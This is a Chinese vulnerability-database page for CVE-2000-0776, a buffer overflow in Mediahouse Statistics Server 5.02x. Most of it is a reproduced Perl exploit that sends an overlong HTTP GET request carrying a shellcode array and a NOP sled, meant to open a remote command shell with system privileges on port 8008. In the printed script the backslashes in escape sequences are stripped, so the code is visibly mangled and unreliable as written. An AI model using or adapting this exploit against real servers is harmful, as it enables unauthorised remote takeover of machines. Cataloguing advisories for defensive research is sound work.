Mediahouse Statistics Server执行命令漏洞

漏洞ID	1105959	漏洞类型	未知
发布时间	2000-08-10	更新时间	2005-08-17
CVE编号	CVE-2000-0776	CNNVD-ID	CNNVD-200010-064
漏洞平台	Windows	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/20148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-064

|漏洞详情

MediahouseStatisticsServer5.02x版本存在漏洞。远程攻击者可以借助超长HTTPGET请求执行任意命令。

|漏洞EXP

source: http://www.securityfocus.com/bid/1568/info

Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code.


#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit. 
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
# http://www.deepzone.org
# http://deepzone.cjb.net       
# http://mareasvivas.cjb.net  (|Zan homepage)
#
# --|Zan <[email protected]>
# ----------------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo <[email protected]>
#
# exploit coded by
# -- |Zan <[email protected]>
#
# ----------------------------------------------------------------

use IO::Socket;


@crash = (
"x68","x8b","x41","x1d","x01","x68","x41","x41","x41",
"x41","x68","x61","x41","x41","x41","x58","x59","x5f",
"x2b","xc1","xaa","x33","xc9","x66","xb9","x71","x04",
"x90","x90","x90","x68","xbd","x3e","x1d","x01","x5e",
"x56","x5f","x33","xd2","x80","xc2","x99","xac","x32",
"xc2","xaa","xe2","xfa","x71","x99","x99","x99","x99",
"xc4","x18","x74","xaf","x89","xd9","x99","x14","x2c",
"xd4","x8a","xd9","x99","x14","x24","xcc","x8a","xd9",
"x99","xf3","x9e","x09","x09","x09","x09","xc0","x71",
"x4b","x9b","x99","x99","x14","x2c","x1c","x8a","xd9",
"x99","x14","x24","x17","x8a","xd9","x99","xf3","x93",
"x09","x09","x09","x09","xc0","x71","x23","x9b","x99",
"x99","xf3","x99","x14","x2c","x8b","x8d","xd9","x99",
"xcf","x14","x2c","x87","x8d","xd9","x99","xcf","x14",
"x2c","xbb","x8d","xd9","x99","xcf","x66","x0c","x17",
"x8a","xd9","x99","xf3","x99","x14","x2c","x8b","x8d",
"xd9","x99","xcf","x14","x2c","xbf","x8d","xd9","x99",
"xcf","x14","x2c","xb3","x8d","xd9","x99","xcf","x66",
"x0c","x17","x8a","xd9","x99","x5e","x1c","xb7","x8d",
"xd9","x99","xdd","x99","x99","x99","x14","x2c","xb7",
"x8d","xd9","x99","xcf","x66","x0c","x0b","x8a","xd9",
"x99","x14","x2c","xff","x8d","xd9","x99","x34","xc9",
"x66","x0c","x37","x8a","xd9","x99","x14","x2c","xf3",
"x8d","xd9","x99","x34","xc9","x66","x0c","x37","x8a",
"xd9","x99","x14","x2c","xb3","x8d","xd9","x99","x14",
"x24","xff","x8d","xd9","x99","x3c","x14","x2c","x87",
"x8d","xd9","x99","x34","x14","x24","xf3","x8d","xd9",
"x99","x32","x14","x24","xf7","x8d","xd9","x99","x32",
"x5e","x1c","xc7","x8d","xd9","x99","x99","x99","x99",
"x99","x5e","x1c","xc3","x8d","xd9","x99","x98","x98",
"x99","x99","x14","x2c","xeb","x8d","xd9","x99","xcf",
"x14","x2c","xb7","x8d","xd9","x99","xcf","xf3","x99",
"xf3","x99","xf3","x89","xf3","x98","xf3","x99","xf3",
"x99","x14","x2c","x1b","x8d","xd9","x99","xcf","xf3",
"x99","x66","x0c","x0f","x8a","xd9","x99","xf1","x99",
"xb9","x99","x99","x09","xf1","x99","x9b","x99","x99",
"x66","x0c","x07","x8a","xd9","x99","x10","x1c","x13",
"x8d","xd9","x99","xaa","x59","xc9","xd9","xc9","xd9",
"xc9","x66","x0c","xcc","x8a","xd9","x99","xc9","xc2",
"xf3","x89","x14","x2c","x9b","x8d","xd9","x99","xcf",
"xca","x66","x0c","xc0","x8a","xd9","x99","xf3","x9a",
"xca","x66","x0c","xc4","x8a","xd9","x99","x14","x2c",
"x17","x8d","xd9","x99","xcf","x14","x2c","x9b","x8d",
"xd9","x99","xcf","xca","x66","x0c","xf8","x8a","xd9",
"x99","x14","x24","x0b","x8d","xd9","x99","x32","xaa",
"x59","xc9","x14","x24","x07","x8d","xd9","x99","xce",
"xc9","xc9","xc9","x14","x2c","xbb","x8d","xd9","x99",
"x34","xc9","x66","x0c","x03","x8a","xd9","x99","xf3",
"xa9","x66","x0c","x33","x8a","xd9","x99","x72","xd4",
"x09","x09","x09","xaa","x59","xc9","x14","x24","x07",
"x8d","xd9","x99","xce","xc9","xc9","xc9","x14","x2c",
"xbb","x8d","xd9","x99","x34","xc9","x66","x0c","x03",
"x8a","xd9","x99","xf3","xa9","x66","x0c","x33","x8a",
"xd9","x99","x1a","x24","x07","x8d","xd9","x99","x9b",
"x96","x1b","x8e","x98","x99","x99","x18","x24","x07",
"x8d","xd9","x99","x98","xb9","x99","x99","xeb","x97",
"x09","x09","x09","x09","x5e","x1c","x07","x8d","xd9",
"x99","x99","xb9","x99","x99","xf3","x99","x12","x1c",
"x07","x8d","xd9","x99","x14","x24","x07","x8d","xd9",
"x99","xce","xc9","x12","x1c","x13","x8d","xd9","x99",
"xc9","x14","x2c","xbb","x8d","xd9","x99","x34","xc9",
"x66","x0c","x3b","x8a","xd9","x99","xf3","xa9","x66",
"x0c","x33","x8a","xd9","x99","x12","x1c","x07","x8d",
"xd9","x99","xf3","x99","xc9","x14","x2c","x13","x8d",
"xd9","x99","x34","xc9","x14","x2c","x0b","x8d","xd9",
"x99","x34","xc9","x66","x0c","xfc","x8a","xd9","x99",
"xf3","x99","x14","x24","x07","x8d","xd9","x99","xce",
"xf3","x99","xf3","x99","xf3","x99","x14","x2c","xbb",
"x8d","xd9","x99","x34","xc9","x66","x0c","x03","x8a",
"xd9","x99","xf3","xa9","x66","x0c","x33","x8a","xd9",
"x99","xaa","x50","xa0","x14","x07","x8d","xd9","x99",
"x96","x1e","xfe","x66","x66","x66","xf3","x99","xf1",
"x99","xb9","x99","x99","x09","x14","x2c","x13","x8d",
"xd9","x99","x34","xc9","x14","x2c","x0b","x8d","xd9",
"x99","x34","xc9","x66","x0c","xf0","x8a","xd9","x99",
"x10","x1c","x03","x8d","xd9","x99","xf3","x99","x14",
"x24","x07","x8d","xd9","x99","xce","xc9","x14","x2c",
"x13","x8d","xd9","x99","x34","xc9","x14","x2c","xbf",
"x8d","xd9","x99","x34","xc9","x66","x0c","x3f","x8a",
"xd9","x99","xf3","xa9","x66","x0c","x33","x8a","xd9",
"x99","xf3","x99","x12","x1c","x03","x8d","xd9","x99",
"x14","x24","x07","x8d","xd9","x99","xce","xc9","x12",
"x1c","x13","x8d","xd9","x99","xc9","x14","x2c","xbb",
"x8d","xd9","x99","x34","xc9","x66","x0c","x3b","x8a",
"xd9","x99","xf3","xa9","x66","x0c","x33","x8a","xd9",
"x99","x70","x90","x67","x66","x66","x14","x2c","x0b",
"x8d","xd9","x99","x34","xc9","x66","x0c","xf4","x8a",
"xd9","x99","x14","x2c","x0f","x8d","xd9","x99","x34",
"xc9","x66","x0c","xf4","x8a","xd9","x99","xf3","x99",
"x66","x0c","x2b","x8a","xd9","x99","xc8","xcf","xf1",
"x6d","x39","xdc","x99","xc3","x66","x8b","xc9","xc2",
"xc0","xce","xc7","xc8","xcf","xca","xf1","xe5","x38",
"xdc","x99","xc3","x66","x8b","xc9","x35","x1d","x59",
"xec","x62","xc1","x32","xc0","x7b","x73","x5a","xce",
"xca","xd6","xda","xd2","xaa","xab","x99","xea","xf6",
"xfa","xf2","xfc","xed","x99","xfb","xf0","xf7","xfd",
"x99","xf5","xf0","xea","xed","xfc","xf7","x99","xf8",
"xfa","xfa","xfc","xe9","xed","x99","xea","xfc","xf7",
"xfd","x99","xeb","xfc","xfa","xef","x99","xfa","xf5",
"xf6","xea","xfc","xea","xf6","xfa","xf2","xfc","xed",
"x99","xd2","xdc","xcb","xd7","xdc","xd5","xaa","xab",
"x99","xda","xeb","xfc","xf8","xed","xfc","xc9","xf0",
"xe9","xfc","x99","xde","xfc","xed","xca","xed","xf8",
"xeb","xed","xec","xe9","xd0","xf7","xff","xf6","xd8",
"x99","xda","xeb","xfc","xf8","xed","xfc","xc9","xeb",
"xf6","xfa","xfc","xea","xea","xd8","x99","xc9","xfc",
"xfc","xf2","xd7","xf8","xf4","xfc","xfd","xc9","xf0",
"xe9","xfc","x99","xde","xf5","xf6","xfb","xf8","xf5",
"xd8","xf5","xf5","xf6","xfa","x99","xcb","xfc","xf8",
"xfd","xdf","xf0","xf5","xfc","x99","xce","xeb","xf0",
"xed","xfc","xdf","xf0","xf5","xfc","x99","xca","xf5",
"xfc","xfc","xe9","x99","xda","xf5","xf6","xea","xfc",
"xd1","xf8","xf7","xfd","xf5","xfc","x99","xdc","xe1",
"xf0","xed","xcd","xf1","xeb","xfc","xf8","xfd","x99",
"x9b","x99","x86","xd1","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x95","x99",
"x99","x99","x99","x99","x99","x99","x98","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","xda","xd4","xdd","xb7","xdc","xc1","xdc",
"x99","x99","x99","x99","x99","x89","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x99","x99",
"x99","x99","x99","x99","x99","x99","x99","x90","x90");

# -------------------------------------------------------------------

sub pcommands
{
	die "usage: $0 hostname portn" if (@ARGV != 2);
	($host) = shift @ARGV;
	($port) = shift @ARGV;
}

sub show_credits
{
	print "nnt (c) 2000 Deep Zone - Statistics Server 5.02x's exploitn";
	print "ntt  Coded by |Zan - [email protected]";
	print "nt-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-nn";
}

sub bofit
{

	print "nspawning remote shell on port 8008 ...nn";

	$s = IO::Socket::INET->new(PeerAddr=>$host,
                                   PeerPort=>$port,
				   Proto=>"tcp");

	if(!$s) { die "error.n"; }	

	print $s "GET http://O";

	foreach $item (@crash) {
        	print $s $item
              } 

	for ($cont=0; $cont<840;$cont++) {
		print $s "x90"
              }

	print $s "x8cx3ex1dx01";

	print $s "rnrn";

	while (<$s>) { print }

	print "... done.nn";

}

# ----- begin

show_credits;
pcommands;
bofit;

# ----- that's all :)

|参考资料

来源:BID
名称:1568
链接:http://www.securityfocus.com/bid/1568
来源:BUGTRAQ
名称:20000810[DeepZoneAdvisory]StatisticsServer5.02xstackoverflow(Win2kremoteexploit)
链接:http://archives.neohapsis.com/archives/bugtraq/2000-08/0118.html
来源:XF
名称:mediahouse-stats-livestats-bo(5113)
链接:http://xforce.iss.net/static/5113.php

相关推荐: SLMail CVE-1999-0231 Denial-Of-Service Vulnerability

SLMail CVE-1999-0231 Denial-Of-Service Vulnerability 漏洞ID 1209198 漏洞类型 Input Validation Error 发布时间 1999-01-01 更新时间 1999-01-01 CVE编…

文章版权归作者所有，未经允许请勿转载。

THE END